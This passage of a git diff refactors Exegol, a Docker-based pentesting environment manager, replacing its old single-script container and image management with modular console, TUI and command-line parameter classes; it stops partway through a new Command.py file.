header_style="bold blue", border_style="blue", box=box.SIMPLE) - table.add_column("Image tag") - table.add_column("Real size") - table.add_column("Type") - for image in images: - if image[1] != "": - table.add_row(image[1], image[2], image[3]) - elif options.verbosity >= 1: - table = Table(show_header=True, header_style="bold blue", border_style="grey35", box=box.SQUARE) - table.add_column("Id") - table.add_column("Image tag") - table.add_column("Real size") - table.add_column("Type") - for image in images: - table.add_row(image[0], image[1], image[2], image[3]) - console.print(table) - print() - except requests.exceptions.ConnectionError as err: - logger.warning("Connection Error: you probably have no internet, skipping online queries") - logger.warning(f"Error: {err}") - - -def info_containers(): - len_containers = len(client.containers.list(all=True, filters={"name": "exegol-"})) - if len_containers > 0: - logger.info("Available local containers: {}".format(len_containers)) - containers = [] - for container in client.containers.list(all=True, filters={"name": "exegol-"}): - id = container.attrs["Id"][:12] - tag = container.attrs["Name"].replace('/exegol-', '') - state = container.attrs["State"]["Status"] - if state == "running": - state = "[green]" + state + "[/green]" - image = container.attrs["Config"]["Image"] - logger.debug("Fetching details on containers creation") - details = [] - if was_created_with_gui(container): - details.append("--X11") - if was_created_with_host_networking(container): - details.append("--host-network") - if was_created_with_device(container): - details.append("--device {}".format(was_created_with_device(container))) - if was_created_with_privileged(container): - details.append("[orange3]--privileged[/orange3]") - details = " ".join(details) - logger.debug("Fetching volumes for each container") - volumes = "" - if "Binds" in container.attrs["HostConfig"].keys(): - for bind in container.attrs["HostConfig"]["Binds"]: - volumes += 
bind.replace(":", " ↔ ") + "\n" - if "Mounts" in container.attrs["HostConfig"].keys(): - for mount in container.attrs["HostConfig"]["Mounts"]: - volumes += mount["VolumeOptions"]["DriverConfig"]["Options"]["device"] - volumes += " ↔ " - volumes += mount["Target"] - volumes += "\n" - containers.append([id, tag, state, image, details, volumes]) - if options.verbosity == 0: - table = Table(show_header=True, header_style="bold blue", border_style="blue", box=box.SIMPLE) - table.add_column("Container tag") - table.add_column("State") - table.add_column("Image (repo/image:tag)") - table.add_column("Creation details") - for container in containers: - table.add_row(container[1], container[2], container[3], container[4]) - elif options.verbosity >= 1: - table = Table(show_header=True, header_style="bold blue", border_style="grey35", box=box.SQUARE) - table.add_column("Id") - table.add_column("Container tag") - table.add_column("State") - table.add_column("Image (repo/image:tag)") - table.add_column("Creation details") - table.add_column("Binds & mounts") - for container in containers: - table.add_row(container[0], container[1], container[2], container[3], container[4], container[5]) - console.print(table) - print() - - -def info(): - info_images() - info_containers() - - -def exec(): - # TODO merge some function with 'start' process - global LOOP_PREVENTION - len_images = len(client.images.list(IMAGE_NAME, filters={"dangling": False})) - if options.exec is None: - logger.error("No command supplied (use -e or --exec parameter)") - return - if not len_images == 0: - if LOOP_PREVENTION == "": - logger.success("{} Exegol images exist".format(len_images)) - if not options.containertag: - exegol_container_count = len(client.containers.list(all=True, filters={"name": "exegol-"})) - if exegol_container_count > 0: - select_containertag(LOCAL_GIT_BRANCH) - else: - # no container exists, let's set the containertag and we'll bypass the next condition - # and go directly to the else, 
i.e. the container creation - # default to local git branch or master if none - if not LOCAL_GIT_BRANCH: - options.containertag = "master" - else: - options.containertag = LOCAL_GIT_BRANCH - if container_exists(options.containertag): - if LOOP_PREVENTION == "" or LOOP_PREVENTION == "create": - logger.success("Container exists") - containers = client.containers.list(all=True, filters={"name": "exegol-" + options.containertag}) - for container in containers: - if not container.name == "exegol-" + options.containertag: - containers.remove(container) - container = containers[0] - if container.attrs["State"]["Status"] == "running": - if LOOP_PREVENTION == "exec": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.success("Container is up") - container_analysis(container) - if was_created_with_gui(container): - logger.info("Running xhost command for display sharing") - exec_popen( - "xhost +local:{}".format( - client.api.inspect_container("exegol-" + options.containertag)["Config"][ - "Hostname" - ] - ) - ) - logger.info("Executing command on Exegol as daemon") - # Using 'zsh source /opt/.zsh_aliases; eval cmd' to interpret alias commands on a non-interactive shell - cmd = "zsh -c \"source /opt/.zsh_aliases; eval \'{}\'\"".format(options.exec.replace("\"", "\\\"").replace("\'", "\\\'")) - logger.debug(cmd) - container.exec_run(cmd, detach=True) - LOOP_PREVENTION = "exec" - else: - if LOOP_PREVENTION == "start": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.warning("Container is down") - logger.info("Starting the container") - exec_popen("docker start {}".format("exegol-" + options.containertag)) - LOOP_PREVENTION = "start" - exec() - else: - if LOOP_PREVENTION == "create": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.warning("Container does not exist") - info_images() - if LOCAL_GIT_BRANCH == "master": # 
TODO: fix this crap when I'll have branch names that are equal to docker tags - default_dockertag = "stable" - else: - default_dockertag = LOCAL_GIT_BRANCH - imagetag = input( - "{}[?]{} What image do you want the container to create to be based upon [default: {}]? ".format( - BOLD_BLUE, END, default_dockertag)) - if not imagetag: - imagetag = default_dockertag - if client.images.list(IMAGE_NAME + ":" + imagetag): - info_containers() - if options.containertag: - default_containertag = options.containertag - elif not container_exists(imagetag): - default_containertag = imagetag - else: - logger.error(f"Something's wrong. Please create a detailed issue with everything you did and are trying to do (https://github.com/ShutdownRepo/Exegol/issues)") - # When running start without supplying a container tag, there are multiple scenarios - # 1. if >= 1 container(s) exist(s), one will be chosen to start - # 2. else, a container is created, either using a supplied tag or using the imagetag - # The user shouldn't end up here. - client.containers.list(all=True, filters={"name": "exegol-"}) - containertag = input( - "{}[?]{} What unique tag do you want to name your container with (one not in list above) [default: {}]? ".format( - BOLD_BLUE, END, default_containertag)) - if containertag == "": - containertag = default_containertag - options.containertag = containertag - logger.info("Creating the container") - logger.debug("{} container based on the {} image".format("exegol-" + containertag, - IMAGE_NAME + ":" + imagetag)) - base_options, advanced_options = container_creation_options(options.containertag) - exec_popen("docker create {} {} {}:{}".format(base_options, advanced_options, IMAGE_NAME, imagetag)) - LOOP_PREVENTION = "create" - exec() - else: - logger.warning("Image {} does not exist. 
You must supply a tag from the list above.".format( - IMAGE_NAME + ":" + imagetag)) - else: - if LOOP_PREVENTION == "install": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.warning("Exegol image does not exist, you must install it first") - confirmation = input( - "{}[?]{} Do you wish to install it now (↓ ~6GB)? [y/N] ".format( - BOLD_ORANGE, END - ) - ) - if confirmation == "y" or confirmation == "yes" or confirmation == "Y": - install() - LOOP_PREVENTION = "install" - exec() - - -def version(): - logger.info(f"You are running version {VERSION}") - -if __name__ == "__main__": - BOLD_GREEN = "\033[1;32m" - BOLD_BLUE = "\033[1;34m" - BOLD_WHITE = "\033[1;37m" - BOLD_RED = "\033[1;31m" - BOLD_ORANGE = "\033[1;93m" - END = "\033[0m" - BLUE = "\033[0;34m" - GREEN = "\033[0;32m" - YELLOW = "\033[0;33m" - RED = "\033[0;31m" - - IMAGE_NAME = "nwodtuhs/exegol" - EXEGOL_PATH = os.path.dirname(os.path.realpath(__file__)) - SHARED_DATA_VOLUMES = EXEGOL_PATH + "/shared-data-volumes" - SHARED_RESOURCES = EXEGOL_PATH + "/shared-resources" - - options = get_options() - logger = Logger(options.verbosity, options.quiet) - console = Console() - - if not options.verify: - requests.packages.urllib3.disable_warnings() - logger.verbose("Disabling warnings of insecure connection for invalid certificates") - requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' - logger.debug("Allowing the use of deprecated and weak cipher methods") - try: - requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' - except AttributeError: - pass - - try: - client = docker.from_env() - except docker.errors.DockerException as e: - if "ConnectionRefusedError" in str(e): - logger.error("Connection to docker service API refused (your docker service is probably down)") - elif "PermissionError" in str(e): - logger.error("Connection to docker service API not allowed (you probably need higher privileges 
to run " - "docker, try to use sudo or to add your user to the 'docker' group)") - else: - logger.error(f"Some error occurred while calling the docker service API: {e}") - exit(0) - except Exception as e: - logger.error(f"Some error occurred while calling the docker service API: {e}") - - # get working git branch - LOCAL_GIT_BRANCH = \ - subprocess.Popen(f"git -C {EXEGOL_PATH} symbolic-ref --short -q HEAD".split(), stdout=subprocess.PIPE, - stderr=subprocess.PIPE).communicate()[0].decode("utf-8").strip() - if not LOCAL_GIT_BRANCH: - logger.debug("No local git branch or error when fetching it, defaulting to 'master'") - LOCAL_GIT_BRANCH = "master" - else: - logger.debug("Local git branch: {}".format(LOCAL_GIT_BRANCH)) - - EXEGOL_PATH = os.path.dirname(os.path.realpath(__file__)) - - LOOP_PREVENTION = "" - globals()[options.action]() +if __name__ == '__main__': + main() diff --git a/exegol/__init__.py b/exegol/__init__.py new file mode 100644 index 00000000..75368052 --- /dev/null +++ b/exegol/__init__.py @@ -0,0 +1,4 @@ +from exegol.utils.ConstantConfig import ConstantConfig + +__version__ = ConstantConfig.version +__title__ = "exegol" diff --git a/exegol/__main__.py b/exegol/__main__.py new file mode 100644 index 00000000..8850fa23 --- /dev/null +++ b/exegol/__main__.py @@ -0,0 +1,9 @@ +try: + from exegol.manager.ExegolController import main +except ModuleNotFoundError as e: + print("Mandatory dependencies are missing:", e) + print("Please install them with pip3 install -r requirements.txt") + exit(1) + +if __name__ == "__main__": + main() diff --git a/exegol/console/ConsoleFormat.py b/exegol/console/ConsoleFormat.py new file mode 100644 index 00000000..27133f23 --- /dev/null +++ b/exegol/console/ConsoleFormat.py @@ -0,0 +1,18 @@ +from typing import Tuple, Union + + +# Generic text generation functions + +def boolFormatter(val: bool) -> str: + """Generic text formatter for bool value""" + return '[green]On :heavy_check_mark:[/green] ' if val else '[orange3]Off 
:axe:[/orange3]' + + +def getColor(val: Union[bool, int, str]) -> Tuple[str, str]: + """Generic text color getter for bool value""" + if type(val) is str: + try: + val = int(val) + except ValueError: + val = False + return ('[green]', '[/green]') if val else ('[orange3]', '[/orange3]') diff --git a/exegol/console/ExegolProgress.py b/exegol/console/ExegolProgress.py new file mode 100644 index 00000000..d4f46921 --- /dev/null +++ b/exegol/console/ExegolProgress.py @@ -0,0 +1,19 @@ +from typing import cast + +from rich.progress import Progress, Task, TaskID + + +class ExegolProgress(Progress): + """Addition of a practical function to Rich Progress""" + + def getTask(self, task_id: TaskID) -> Task: + """Return a specific task from task_id without error""" + task = self._tasks.get(task_id) + if task is None: + # If task doesn't exist, raise IndexError exception + raise IndexError + return cast(Task, task) + + def __enter__(self) -> "ExegolProgress": + super(ExegolProgress, self).__enter__() + return self diff --git a/exegol/console/ExegolPrompt.py b/exegol/console/ExegolPrompt.py new file mode 100644 index 00000000..c7c4fa8f --- /dev/null +++ b/exegol/console/ExegolPrompt.py @@ -0,0 +1,12 @@ +import rich.prompt + + +def Confirm(question: str, default: bool) -> bool: + """Quick function to format rich Confirmation and options on every exegol interaction""" + default_text = "[bright_magenta][Y/n][/bright_magenta]" if default else "[bright_magenta]\[y/N][/bright_magenta]" + formatted_question = f"[bold blue][?][/bold blue] {question} {default_text}" + return rich.prompt.Confirm.ask( + formatted_question, + show_choices=False, + show_default=False, + default=default) diff --git a/exegol/console/LayerTextColumn.py b/exegol/console/LayerTextColumn.py new file mode 100644 index 00000000..d2fdffe3 --- /dev/null +++ b/exegol/console/LayerTextColumn.py @@ -0,0 +1,44 @@ +import os +from typing import Optional + +from rich.console import JustifyMethod +from rich.highlighter import 
Highlighter +from rich.progress import TextColumn, Task, DownloadColumn +from rich.style import StyleType +from rich.table import Column +from rich.text import Text + +from exegol.utils.ExeLog import logger + + +class LayerTextColumn(TextColumn, DownloadColumn): + """Merging two Rich class to obtain a double behavior in the same RichTable""" + + def __init__(self, + text_format: str, + layer_key: str, + style: StyleType = "none", + justify: JustifyMethod = "left", + markup: bool = True, + highlighter: Optional[Highlighter] = None, + table_column: Optional[Column] = None, + binary_units: bool = False + ) -> None: + # Custom field + self.__data_key = layer_key + # Inheritance configuration + try: + TextColumn.__init__(self, text_format, style, justify, markup, highlighter, table_column) + except TypeError: + logger.critical(f"Your version of Rich does not correspond to the project requirements. Please update your dependencies with pip:{os.linesep}" + f"[bright_magenta]python3 -m pip install --user --requirement requirements.txt[/bright_magenta]") + DownloadColumn.__init__(self, binary_units, table_column) + + def render(self, task: "Task") -> Text: + """Custom render depending on the existence of data with data_key""" + if task.fields.get(self.__data_key) is None: + # Default render with classic Text render + return TextColumn.render(self, task) + else: + # If the task download a file, render the Download progress view + return DownloadColumn.render(self, task) diff --git a/exegol/console/TUI.py b/exegol/console/TUI.py new file mode 100644 index 00000000..72c1d0e7 --- /dev/null +++ b/exegol/console/TUI.py @@ -0,0 +1,417 @@ +import os +import re +from typing import Union, Optional, List, Dict, Type, Generator, Set, cast, Sequence, Tuple + +from rich import box +from rich.progress import TextColumn, BarColumn, TransferSpeedColumn, TimeElapsedColumn, TimeRemainingColumn, TaskID +from rich.prompt import Prompt +from rich.table import Table + +from 
exegol.console.ConsoleFormat import boolFormatter, getColor +from exegol.console.ExegolProgress import ExegolProgress +from exegol.console.ExegolPrompt import Confirm +from exegol.console.LayerTextColumn import LayerTextColumn +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.model.ExegolContainer import ExegolContainer +from exegol.model.ExegolContainerTemplate import ExegolContainerTemplate +from exegol.model.ExegolImage import ExegolImage +from exegol.model.SelectableInterface import SelectableInterface +from exegol.utils.ExeLog import logger, console, ExeLog + + +class ExegolTUI: + """Class gathering different methods of Terminal User Interface (or TUI)""" + + @staticmethod + def downloadDockerLayer(stream: Generator, quick_exit: bool = False): + """Rich interface for docker image layer download from SDK stream""" + layers: Set[str] = set() + layers_downloaded: Set[str] = set() + layers_extracted: Set[str] = set() + downloading: Dict[str, TaskID] = {} + extracting: Dict[str, TaskID] = {} + # Create progress bar with columns + with ExegolProgress(TextColumn("{task.description}", justify="left"), + BarColumn(bar_width=None), + "[progress.percentage]{task.percentage:>3.1f}%", + "•", + LayerTextColumn("[bold]{task.completed}/{task.total}", "layer"), + "•", + TransferSpeedColumn(), + "•", + TimeElapsedColumn(), + "•", + TimeRemainingColumn(), + transient=True) as progress: + task_layers_download = progress.add_task("[bold red]Downloading layers...", total=0) + task_layers_extract = progress.add_task("[bold gold1]Extracting layers...", total=0, start=False) + for line in stream: # Receiving stream from docker API + status = line.get("status", '') + error = line.get("error", '') + layer_id = line.get("id") + if error != "": + logger.error(f"Docker download error: {error}") + logger.critical(f"An error occurred during the image download. 
Exiting.") + if status == "Pulling fs layer": # Identify new layer to download + layers.add(layer_id) + progress.update(task_layers_download, total=len(layers)) + progress.update(task_layers_extract, total=len(layers)) + elif "Pulling from " in status: # Rename task with image name + progress.getTask(task_layers_download).description = \ + f"[bold red]Downloading {status.replace('Pulling from ', '')}:{line.get('id', 'latest')}" + progress.getTask(task_layers_extract).description = \ + f"[bold gold1]Extracting {status.replace('Pulling from ', '')}:{line.get('id', 'latest')}" + elif status == "Download complete" or status == "Pull complete": # Mark task as complete and remove it from the pool + # Select task / layer pool depending on the status + task_pool = downloading + layer_pool = layers_downloaded + if status == "Pull complete": + task_pool = extracting + layer_pool = layers_extracted + # Tagging current layer as ended + layer_pool.add(layer_id) + # Remove finished layer progress bar + layer_task = task_pool.get(layer_id) + if layer_task is not None: + progress.remove_task(layer_task) # Remove progress bar + task_pool.pop(layer_id) # Remove task from pool + # Update global task completion status + progress.update(task_layers_download, completed=len(layers_downloaded)) + progress.update(task_layers_extract, completed=len(layers_extracted)) + elif status == "Downloading" or status == "Extracting": # Handle download or extract progress + task_pool = downloading + if status == "Extracting": + task_pool = extracting + if not progress.getTask(task_layers_extract).started: + progress.start_task(task_layers_extract) + task_id = task_pool.get(layer_id) + progressDetail = line.get("progressDetail", {}) + if task_id is None: # If this is a new layer, create a new task accordingly + task_id = progress.add_task( + f"[{'blue' if status == 'Downloading' else 'magenta'}]{status} {layer_id}", + total=progressDetail.get("total", 100), + layer=layer_id) + task_pool[layer_id] = 
task_id + # Updating task progress + progress.update(task_id, completed=progressDetail.get("current", 100)) + if status == "Extracting" and progressDetail.get("current", 0) == progressDetail.get("total", 100): + progress.update(task_id, description=f"[green]Checksum {layer_id} ...") + elif "Image is up to date" in status or "Status: Downloaded newer image for" in status: + logger.success(status) + if quick_exit: + break + else: + logger.debug(line) + + @staticmethod + def buildDockerImage(build_stream: Generator): + """Rich interface for docker image building from SDK stream""" + # Prepare log file + logfile = None + if ParametersManager().build_log is not None: + # Opening log file in line buffering mode (1) to support tail -f [file] + logfile = open(ParametersManager().build_log, 'a', buffering=1) + # Follow stream + for line in build_stream: + stream_text = line.get("stream", '') + error_text = line.get("error", '') + if logfile is not None: + logfile.write(stream_text) + logfile.write(error_text) + if error_text != "": + logger.error(f"Docker build error: {error_text}") + logger.critical( + f"An error occurred during the image build (code: {line.get('errorDetail', {}).get('code', '?')}). 
Exiting.") + if stream_text.strip() != '': + if "Step" in stream_text: + logger.info(stream_text.rstrip()) + elif "--->" in stream_text or \ + "Removing intermediate container " in stream_text or \ + re.match(r"Successfully built [a-z0-9]{12}", stream_text) or \ + re.match(r"^Successfully tagged ", stream_text): + logger.verbose(stream_text.rstrip()) + else: + logger.raw(stream_text, level=ExeLog.ADVANCED) + if ': FROM ' in stream_text: + logger.info("Downloading docker image") + ExegolTUI.downloadDockerLayer(build_stream, quick_exit=True) + if logfile is not None: + logfile.close() + + @staticmethod + def printTable(data: Union[Sequence[SelectableInterface], Sequence[str], Sequence[Dict[str, str]]], title: Optional[str] = None): + """Printing Rich table for a list of object""" + logger.empty_line() + table = Table(title=title, show_header=True, header_style="bold blue", border_style="grey35", + box=box.SQUARE, title_justify="left") + if len(data) == 0: + logger.debug("No data supplied") + return + else: + if type(data[0]) is ExegolImage: + ExegolTUI.__buildImageTable(table, cast(Sequence[ExegolImage], data)) + elif type(data[0]) is ExegolContainer: + ExegolTUI.__buildContainerTable(table, cast(Sequence[ExegolContainer], data)) + elif type(data[0]) is str: + if title is not None: + ExegolTUI.__buildStringTable(table, cast(Sequence[str], data), cast(str, title)) + else: + ExegolTUI.__buildStringTable(table, cast(Sequence[str], data)) + elif type(data[0]) is dict: + ExegolTUI.__buildDictTable(table, cast(Sequence[Dict[str, str]], data)) + else: + logger.error(f"Print table of {type(data[0])} is not implemented") + raise NotImplementedError + console.print(table) + logger.empty_line() + + @staticmethod + def __buildImageTable(table: Table, data: Sequence[ExegolImage]): + """Building Rich table from a list of ExegolImage""" + table.title = "[not italic]:flying_saucer: [/not italic][gold3][g]Available images[/g][/gold3]" + # Define columns + verbose_mode = 
logger.isEnabledFor(ExeLog.VERBOSE) + debug_mode = logger.isEnabledFor(ExeLog.ADVANCED) + if verbose_mode: + table.add_column("Id") + table.add_column("Image tag") + if verbose_mode: + table.add_column("Download size") + table.add_column("Size on disk") + table.add_column("Build date (UTC)") + else: + # Depending on whether the image has already been downloaded or not, + # it will show the download size or the size on disk + table.add_column("Size") + table.add_column("Status") + # Load data into the table + for image in data: + # ToBeRemoved images are only shown in verbose mode + if image.isLocked() and not verbose_mode: + continue + if verbose_mode: + table.add_row(image.getLocalId(), image.getDisplayName(), image.getDownloadSize(), + image.getRealSize(), image.getBuildDate(), image.getStatus()) + else: + table.add_row(image.getDisplayName(), image.getSize(), image.getStatus()) + + @staticmethod + def __buildContainerTable(table: Table, data: Sequence[ExegolContainer]): + """Building Rich table from a list of ExegolContainer""" + table.title = "[not italic]:alien: [/not italic][gold3][g]Available containers[/g][/gold3]" + # Define columns + verbose_mode = logger.isEnabledFor(ExeLog.VERBOSE) + debug_mode = logger.isEnabledFor(ExeLog.ADVANCED) + if verbose_mode: + table.add_column("Id") + table.add_column("Container tag") + table.add_column("State") + table.add_column("Image tag") + table.add_column("Configurations") + if verbose_mode: + table.add_column("Mounts") + table.add_column("Devices") + table.add_column("Envs") + # Load data into the table + for container in data: + if verbose_mode: + table.add_row(container.getId(), container.name, container.getTextStatus(), container.image.getDisplayName(), + container.config.getTextFeatures(verbose_mode), + container.config.getTextMounts(debug_mode), + container.config.getTextDevices(debug_mode), container.config.getTextEnvs(debug_mode)) + else: + table.add_row(container.name, container.getTextStatus(), 
container.image.getDisplayName(), + container.config.getTextFeatures(verbose_mode)) + + @staticmethod + def __buildStringTable(table: Table, data: Sequence[str], title: str = "Key"): + """Building a simple Rich table from a list of string""" + table.title = title + # Define columns + table.add_column(title) + table.show_header = False + # Load data into the table + for string in data: + table.add_row(string) + + @staticmethod + def __buildDictTable(table: Table, data_array: Sequence[Dict[str, str]]): + """Building a simple Rich table from a list of string""" + # Define columns from dict keys + for column in data_array[0].keys(): + table.add_column(column.capitalize()) + # Load data into the table + for data in data_array: + # Array is directly pass as *args to handle dynamic columns number + table.add_row(*data.values()) + + @classmethod + def selectFromTable(cls, + data: Sequence[SelectableInterface], + object_type: Optional[Type] = None, + default: Optional[str] = None, + allow_None: bool = False) -> Union[SelectableInterface, str]: + """Return an object (implementing SelectableInterface) selected by the user + Return a str when allow_none is true and no object have been selected + Raise IndexError of the data list is empty.""" + cls.__isInteractionAllowed() + # Check if there is at least one object in the list + if len(data) == 0: + if object_type is ExegolImage: + logger.warning("No images are installed") + elif object_type is ExegolContainer: + logger.warning("No containers have been created yet") + else: + # Using container syntax by default + logger.warning("No containers have been created yet") + raise IndexError + object_type = type(data[0]) + object_name = "container" if object_type is ExegolContainer else "image" + action = "create" if object_type is ExegolContainer else "build" + # Print data list + cls.printTable(data) + # Get a list of every choice available + choices: Optional[List[str]] = [obj.getKey() for obj in data] + # If no default have been 
supplied, using the first one + if default is None: + default = cast(List[str], choices)[0] + # When allow_none is enable, disabling choices restriction + if allow_None: + choices = None + logger.info( + f"You can use a name that does not already exist to {action} a new {object_name}" + f"{' from local sources' if object_type is ExegolImage else ''}") + while True: + choice = Prompt.ask( + f"[bold blue][?][/bold blue] Select {'an' if object_type is ExegolImage else 'a'} {object_name} by its name", + default=default, choices=choices, + show_choices=False) + for o in data: + if choice == o: + return o + if allow_None: + if Confirm( + f"No {object_name} is available under this name, do you want to {action} it?", + default=True): + return choice + logger.info(f"[red]Please select one of the available {object_name}s[/red]") + else: + logger.critical(f"Unknown error, cannot fetch selected object.") + + @classmethod + def multipleSelectFromTable(cls, + data: Sequence[SelectableInterface], + object_type: Type = None, + default: Optional[str] = None) -> Sequence[SelectableInterface]: + """Return a list of object (implementing SelectableInterface) selected by the user + Raise IndexError of the data list is empty.""" + cls.__isInteractionAllowed() + result = [] + pool = cast(List[SelectableInterface], data).copy() + if object_type is None and len(pool) > 0: + object_type = type(pool[0]) + if object_type is ExegolContainer: + object_subject = "container" + elif object_type is ExegolImage: + object_subject = "image" + else: + object_subject = "object" + while True: + selected = cast(SelectableInterface, cls.selectFromTable(pool, object_type, default)) + result.append(selected) + pool.remove(selected) + if len(pool) == 0: + return result + elif not Confirm(f"Do you want to select another {object_subject}?", default=False): + return result + + @classmethod + def selectFromList(cls, + data: Union[Dict[str, str], List[str]], + subject: str = "an option", + title: str = "Options", + 
default: Optional[str] = None) -> Union[str, Tuple[str, str]]: + """if data is list(str): Return a string selected by the user + if data is dict: list keys and return a tuple of the selected key corresponding value + Raise IndexError of the data list is empty.""" + cls.__isInteractionAllowed() + if len(data) == 0: + logger.warning("No options were found") + raise IndexError + if type(data) is dict: + submit_data = list(data.keys()) + else: + submit_data = cast(List[str], data) + cls.printTable(submit_data, title=title) + if default is None: + default = submit_data[0] + choice = Prompt.ask(f"[bold blue][?][/bold blue] Select {subject}", default=default, choices=submit_data, + show_choices=False) + if type(data) is dict: + return choice, data[choice] + else: + return choice + + @classmethod + def printContainerRecap(cls, container: ExegolContainerTemplate): + # Fetch data + devices = container.config.getTextDevices(logger.isEnabledFor(ExeLog.VERBOSE)) + envs = container.config.getTextEnvs(logger.isEnabledFor(ExeLog.VERBOSE)) + sysctls = container.config.getSysctls() + capabilities = container.config.getCapabilities() + volumes = container.config.getTextMounts(logger.isEnabledFor(ExeLog.VERBOSE)) + + # Color code + privilege_color = "bright_magenta" + path_color = "magenta" + + logger.empty_line() + recap = Table(border_style="grey35", box=box.SQUARE, title_justify="left", show_header=True) + recap.title = "[not italic]:white_medium_star: [/not italic][gold3][g]Container summary[/g][/gold3]" + # Header + recap.add_column(f"[bold blue]Name[/bold blue]{os.linesep}[bold blue]Image[/bold blue]", justify="right") + container_info_header = f"{container.name}{os.linesep}{container.image.getName()}" + if "N/A" not in container.image.getImageVersion(): + container_info_header += f" - v.{container.image.getImageVersion()}" + if "Unknown" not in container.image.getStatus(): + container_info_header += f" ({container.image.getStatus(include_version=False)})" + 
recap.add_column(container_info_header) + # Main features + recap.add_row("[bold blue]GUI[/bold blue]", boolFormatter(container.config.isGUIEnable())) + recap.add_row("[bold blue]Network[/bold blue]", container.config.getNetworkMode()) + recap.add_row("[bold blue]Timezone[/bold blue]", boolFormatter(container.config.isTimezoneShared())) + recap.add_row("[bold blue]Exegol resources[/bold blue]", boolFormatter(container.config.isExegolResourcesEnable()) + + f"{'[bright_black](/opt/resources)[/bright_black]' if container.config.isExegolResourcesEnable() else ''}") + recap.add_row("[bold blue]My resources[/bold blue]", boolFormatter(container.config.isSharedResourcesEnable()) + + f"{'[bright_black](/my-resources)[/bright_black]' if container.config.isSharedResourcesEnable() else ''}") + recap.add_row("[bold blue]VPN[/bold blue]", container.config.getVpnName()) + if container.config.getPrivileged() is True: + recap.add_row("[bold blue]Privileged[/bold blue]", '[orange3]On :fire:[/orange3]') + else: + recap.add_row("[bold blue]Privileged[/bold blue]", "[green]Off :heavy_check_mark:[/green]") + if len(capabilities) > 0: + recap.add_row(f"[bold blue]Capabilities[/bold blue]", + f"[{privilege_color}]{', '.join(capabilities)}[/{privilege_color}]") + if container.config.isWorkspaceCustom(): + recap.add_row("[bold blue]Workspace[/bold blue]", + f'[{path_color}]{container.config.getHostWorkspacePath()}[/{path_color}] [bright_black](/workspace)[/bright_black]') + else: + recap.add_row("[bold blue]Workspace[/bold blue]", '[bright_magenta]Dedicated[/bright_magenta] [bright_black](/workspace)[/bright_black]') + if len(devices) > 0: + recap.add_row("[bold blue]Devices[/bold blue]", devices.strip()) + if len(envs) > 0: + recap.add_row("[bold blue]Envs[/bold blue]", envs.strip()) + if len(volumes) > 0: + recap.add_row("[bold blue]Volumes[/bold blue]", volumes.strip()) + if len(sysctls) > 0: + recap.add_row("[bold blue]Systctls[/bold blue]", os.linesep.join( + 
[f"[{privilege_color}]{key}[/{privilege_color}] = {getColor(value)[0]}{value}{getColor(value)[1]}" for + key, value in sysctls.items()])) + console.print(recap) + logger.empty_line() + + @classmethod + def __isInteractionAllowed(cls): + # if not ParametersManager().interactive_mode: # TODO improve non-interactive mode + # logger.critical(f'A required information is missing. Exiting.') + pass diff --git a/exegol/console/__init__.py b/exegol/console/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/console/cli/ParametersManager.py b/exegol/console/cli/ParametersManager.py new file mode 100644 index 00000000..a4b38f4d --- /dev/null +++ b/exegol/console/cli/ParametersManager.py @@ -0,0 +1,55 @@ +from argparse import Namespace +from typing import List, Any + +from exegol.console.cli.actions.Command import Command +from exegol.utils.ExeLog import logger +from exegol.utils.MetaSingleton import MetaSingleton +from exegol.utils.argParse import Parser + + +class ParametersManager(metaclass=MetaSingleton): + """This class is a singleton allowing to access from anywhere to any parameter + filled by the user from the CLI arguments""" + + def __init__(self): + # List every action available on the project (from the root Class) + actions: List[Command] = [cls() for cls in Command.__subclasses__()] + # Load & execute argparse + parser: Parser = Parser(actions) + parsing_results = parser.run_parser() + # The user arguments resulting from the parsing will be stored in parameters + self.parameters: Command = self.__loadResults(parser, parsing_results) + + @staticmethod + def __loadResults(parser: Parser, parsing_results: Namespace) -> Command: + """The result of argparse is sent to the action object to replace the parser with the parsed values""" + try: + action: Command = parsing_results.action + action.populate(parsing_results) + return action + except AttributeError: + # Catch missing "action" parameter en CLI + parser.print_help() + exit(0) + + def 
getCurrentAction(self) -> Command: + """Return the object corresponding to the action selected by the user""" + return self.parameters + + def __getattr__(self, item: str) -> Any: + """The getattr function is overloaded to transparently pass the parameter search + in the child object of Command stored in the 'parameters' attribute""" + try: + # The priority is to first return the attributes of the current object + # Using the object generic method to avoid infinite loop to itself + return object.__getattribute__(self, item) + except AttributeError: + # If parameters is called before initialisation (from the next statement), this can create an infinite loop + if item == "parameters": + return None + try: + # If item was not found in self, the search is initiated among the parameters + return getattr(self.parameters, item) + except AttributeError: + # The logger may not work if the call is made before its initialization + logger.debug(f"Attribute not found in parameters: {item}") diff --git a/exegol/console/cli/__init__.py b/exegol/console/cli/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/console/cli/actions/Command.py b/exegol/console/cli/actions/Command.py new file mode 100644 index 00000000..f39ebf05 --- /dev/null +++ b/exegol/console/cli/actions/Command.py @@ -0,0 +1,142 @@ +import os +import re +from argparse import Namespace +from typing import List, Optional, Tuple, Union, Dict, cast + +from exegol.utils.ExeLog import logger + + +class Option: + """This object allows to define and configure an argparse parameter""" + + def __init__(self, *args, dest: Optional[str] = None, **kwargs): + """Generic class to handle Key:Value object directly from the constructor""" + # Set arguments to the object to save every setting, these values will be sent to the argparser + self.args = args + self.kwargs = kwargs + if dest is not None: + self.kwargs["dest"] = dest + self.dest = dest + + def __repr__(self) -> str: + """This overload allows to 
